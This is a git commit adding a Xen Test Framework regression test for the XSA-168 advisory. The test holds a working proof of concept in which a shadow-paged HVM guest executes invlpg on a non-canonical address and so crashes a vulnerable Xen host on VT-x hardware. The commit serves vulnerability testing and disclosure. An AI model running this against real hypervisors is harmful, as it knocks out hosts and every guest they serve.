From: Andrew Cooper <andrew.cooper3@citrix.com>
Date: Thu, 10 Dec 2015 15:59:02 +0000 (+0000)
Subject: XSA-168 Proof of Concept test
X-Git-Url: http://xenbits.xensource.com/gitweb?a=commitdiff_plain;h=01f8b4b93b1a281e2b49edd81316451b152d7e6d;p=people%2Froyger%2Fxen-test-framework.git

XSA-168 Proof of Concept test

Must be run with shadow paging

Signed-off-by: Andrew Cooper <andrew.cooper3@citrix.com>
---

diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index 891d164..537e9e6 100644
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -26,6 +26,8 @@ Coveres XSA-106 and XSA-156.
 
 @subpage test-xsa-167 - PV superpage sanity checks.
 
+@subpage test-xsa-168 - `INVVPID` non-canonical guest address.
+
 
 @section index-utility Utilities
 
diff --git a/tests/xsa-168/Makefile b/tests/xsa-168/Makefile
new file mode 100644
index 0000000..45485e7
--- /dev/null
+++ b/tests/xsa-168/Makefile
@@ -0,0 +1,13 @@
+ROOT := $(abspath $(CURDIR)/../..)
+
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-168
+CATEGORY  := xsa
+TEST-ENVS := hvm64
+
+TEST-EXTRA-CFG := extra.cfg.in
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-168/extra.cfg.in b/tests/xsa-168/extra.cfg.in
new file mode 100644
index 0000000..211661a
--- /dev/null
+++ b/tests/xsa-168/extra.cfg.in
@@ -0,0 +1 @@
+hap=0
diff --git a/tests/xsa-168/main.c b/tests/xsa-168/main.c
new file mode 100644
index 0000000..29389bd
--- /dev/null
+++ b/tests/xsa-168/main.c
@@ -0,0 +1,51 @@
+/**
+ * @file tests/xsa-168/main.c
+ * @ref test-xsa-168
+ *
+ * @page test-xsa-168 XSA-168
+ *
+ * Advisory: [XSA-168](http://xenbits.xen.org/xsa/advisory-168.html)
+ *
+ * This vulnerability only affects VT-x hardware, and can only exploited by a
+ * guest running with shadow paging.
+ *
+ * The `invlpg` (and `invlpga` on AMD) instructions are specified to be nops
+ * for non-canonical addresses.  When using HAP, the instructions are not
+ * intercepted, and dealt with by hardware.
+ *
+ * However with shadow paging, the instructions are intercepted to prevent
+ * @#PF's from not-yet-populated shadows.  On VT-x hardware, this ends up
+ * turning into a `invvpid` in Xen, which does suffer a @#GP on a
+ * non-canonical address.
+ *
+ * To cause Xen to execute an `invvpid` instruction, the address (omitting the
+ * sign extension) must be a small page.  This is covered in XTF because the
+ * single 4K page at NULL is unmapped.
+ *
+ * The testcase attempts to execute such an `invlpg` instruction.  If running
+ * in shadow mode, on VT-x hardware, on a vulnerable version, Xen will crash
+ * with a @#GP fault.  If not, the test will exit cleanly.  The test is unable
+ * to distinguish between a fixed Xen and a test misconfiguration.
+ *
+ * @sa tests/xsa-168/main.c
+ */
+#include <xtf/lib.h>
+
+void test_main(void)
+{
+    printk("XSA-168 PoC\n");
+
+    asm volatile ("invlpg (%0)" :: "q" (0x8000000000000000UL));
+
+    xtf_success(NULL);
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */